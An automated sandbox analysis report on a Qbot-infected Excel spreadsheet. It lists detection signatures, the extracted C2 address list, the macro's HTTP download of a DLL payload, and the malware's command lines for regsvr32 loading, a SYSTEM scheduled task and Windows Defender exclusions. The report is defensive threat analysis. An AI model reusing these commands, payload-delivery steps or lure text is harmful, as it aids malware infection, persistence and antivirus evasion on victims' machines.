Windows Analysis Report Compensation_Reject-958463727-09292021.xls

Overview

General Information

Sample Name: Compensation_Reject-958463727-09292021.xls
Analysis ID: 494138
MD5: 771470585379f22a6c76e4ff08728512
SHA1: 996717d117629fb99f697129c98dab92eac0eca2
SHA256: 310121955d11b8c4ecb14a5373f2dda35ddaac230db890b6e306302e22b11ffe
Tags: xls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
PE file overlay found
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 14.2.regsvr32.exe.701e0000.6.unpack Malware Configuration Extractor: Qbot {"Bot id": "obama106", "Campaign": "1632905607", "Version": "402.363", "C2 list": ["37.210.152.224:995", "120.151.47.189:443", "105.198.236.99:443", "122.11.220.212:2222", "199.27.127.129:443", "41.251.41.14:995", "216.201.162.158:443", "124.123.42.115:2078", "181.118.183.94:443", "120.150.218.241:995", "185.250.148.74:443", "217.17.56.163:443", "182.181.78.18:995", "140.82.49.12:443", "105.159.144.186:995", "89.101.97.139:443", "217.17.56.163:0", "27.223.92.142:995", "95.77.223.148:443", "109.190.253.11:2222", "81.250.153.227:2222", "190.198.206.189:2222", "81.241.252.59:2078", "136.232.34.70:443", "47.22.148.6:443", "93.8.66.216:443", "124.123.42.115:2222", "217.17.56.163:2222", "217.17.56.163:2078", "217.17.56.163:465", "41.228.22.180:443", "76.25.142.196:443", "71.74.12.34:443", "71.80.168.245:443", "75.188.35.168:443", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "67.165.206.193:993", "38.10.201.211:443", "72.252.201.69:443", "71.60.246.5:443", "92.148.59.207:2222", "92.157.171.41:2222", "24.139.72.117:443", "186.18.205.199:995", "24.229.150.54:995", "47.40.196.233:2222", "24.55.112.61:443", "177.130.82.197:2222", "217.17.56.163:443", "217.17.56.163:443", "109.12.111.14:443", "68.204.7.158:443", "186.87.135.68:995", "80.6.192.58:443", "103.148.120.144:443", "75.66.88.33:443", "173.25.166.81:443", "47.40.196.233:2222", "187.156.138.172:443", "82.77.137.101:995", "173.234.155.233:443", "2.178.108.147:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: c:\886_Soon\slip\wrong\126\pull.pdb source: regsvr32.exe, 00000006.00000002.811400368.00000000705DD000.00000002.00020000.sdmp, explorer.exe, 00000007.00000003.811813174.0000000002660000.00000004.00000001.sdmp
Source: Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.811519854.0000000002660000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057AEF6 FindFirstFileW,FindNextFileW, 6_2_7057AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003CAEF6 FindFirstFileW,FindNextFileW, 7_2_003CAEF6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701EAEF6 FindFirstFileW,FindNextFileW, 14_2_701EAEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0037AEF6 FindFirstFileW,FindNextFileW, 15_2_0037AEF6

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 44469.4662202546[1].dat.0.dr Jump to dropped file
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.165.62.15:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 188.165.62.15:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 30 Sep 2021 09:12:37 GMTContent-Type: application/octet-streamContent-Length: 725504Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44469.4662202546.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 39 c1 39 69 7d a0 57 3a 7d a0 57 3a 7d a0 57 3a ce 3c b6 3a 43 a0 57 3a ce 3c b7 3a 7c a0 57 3a c9 3c a4 3a 66 a0 57 3a c9 3c a6 3a 74 a0 57 3a 7d a0 56 3a aa a0 57 3a c9 3c b8 3a 71 a0 57 3a c9 3c a4 3a 7a a0 57 3a c9 3c b9 3a 7c a0 57 3a c9 3c a0 3a f0 a0 57 3a c9 3c b9 3a 7c a0 57 3a c9 3c a6 3a 7c a0 57 3a 52 69 63 68 7d a0 57 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 7b b9 dd 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 0a 00 bc 06 00 00 9e 05 00 00 00 00 00 e6 ba 00 00 00 10 00 00 00 d0 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 4f c6 0b 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 df 0a 00 c4 00 00 00 74 e0 0a 00 50 00 00 00 00 60 0c 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 50 23 00 00 80 c4 0a 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 c4 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 06 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 bb 06 00 00 10 00 00 00 bc 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0c 19 04 00 00 d0 06 00 00 1a 04 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 59 01 00 00 f0 0a 00 00 0e 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 00 02 00 00 00 50 0c 00 00 02 00 00 00 e8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a8 03 00 00 00 60 0c 00 00 04 00 00 00 ea 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 23 00 00 00 70 0c 00 00 24 00 00 00 ee 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44469.4662202546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.15Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: unknown TCP traffic detected without corresponding DNS query: 188.165.62.15
Source: regsvr32.exe, 00000006.00000002.810733585.0000000002170000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.1075133780.0000000001FD0000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.1075013611.0000000000800000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.811888185.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.810268274.00000000007C0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.813547188.0000000001CB0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.814518322.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.887028120.0000000000990000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.810733585.0000000002170000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.1075133780.0000000001FD0000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.1075013611.0000000000800000.00000002.00020000.sdmp, regsvr32.exe, 0000000E.00000002.885542978.0000000000F30000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat Jump to behavior
Source: global traffic HTTP traffic detected: GET /44469.4662202546.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 188.165.62.15Connection: Keep-Alive

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 21 example of notification 22 23 ( 0 Thlsfi|eor
Source: Screenshot number: 4 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Document image extraction number: 0 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1 Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1 Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1 Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44469.4662202546[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Drezd.red
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70585000 6_2_70585000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70586EF0 6_2_70586EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7058237E 6_2_7058237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_70581790 6_2_70581790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7062453A 6_2_7062453A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D5000 7_2_003D5000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D6EF0 7_2_003D6EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D237E 7_2_003D237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_003D1790 7_2_003D1790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F5000 14_2_701F5000
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F6EF0 14_2_701F6EF0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F237E 14_2_701F237E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701F1790 14_2_701F1790
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_7029453A 14_2_7029453A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00385000 15_2_00385000
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00386EF0 15_2_00386EF0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_0038237E 15_2_0038237E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 15_2_00381790 15_2_00381790
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Compensation_Reject-958463727-09292021.xls OLE, VBA macro line: Sub auto_open()
Source: Compensation_Reject-958463727-09292021.xls OLE, VBA macro line: Sub auto_close()
Source: Compensation_Reject-958463727-09292021.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 6_2_7057C702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057CBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 6_2_7057CBB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701EC702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 14_2_701EC702
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701ECBB9 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 14_2_701ECBB9
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Drezd.red.15.dr Static PE information: No import functions for PE file found
Source: Drezd.red.7.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0'
Document contains embedded VBA macros
Source: Compensation_Reject-958463727-09292021.xls OLE indicator, VBA macros: true
PE file overlay found
Source: Drezd.red.15.dr Static PE information: Data appended to the last section found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: 44469.4662202546[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drezd.red.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drezd.red.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Drezd.red.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................!..........&].....(.P.............................)"................................................................!..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................$...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(............... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.(.....N.......(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {0A2617DB-2F69-45ED-A602-BD27C244EA7E} S-1-5-18:NT AUTHORITY\System:Service:
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gruwmuaixpvu' /d '0'
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd1.red Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Drezd2.red Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Drezd.red Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hhxoksfm /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 11:16 /ET 11:28 Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Yenslqus' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gruwmuaixpvu' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Drezd.red' Jump to behavior
Source: C:\Windows\System32\taskeng.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE05F.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@28/6@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7057D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 6_2_7057D565
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 14_2_701E30AA StartServiceCtrlDispatcherA, 14_2_701E30AA
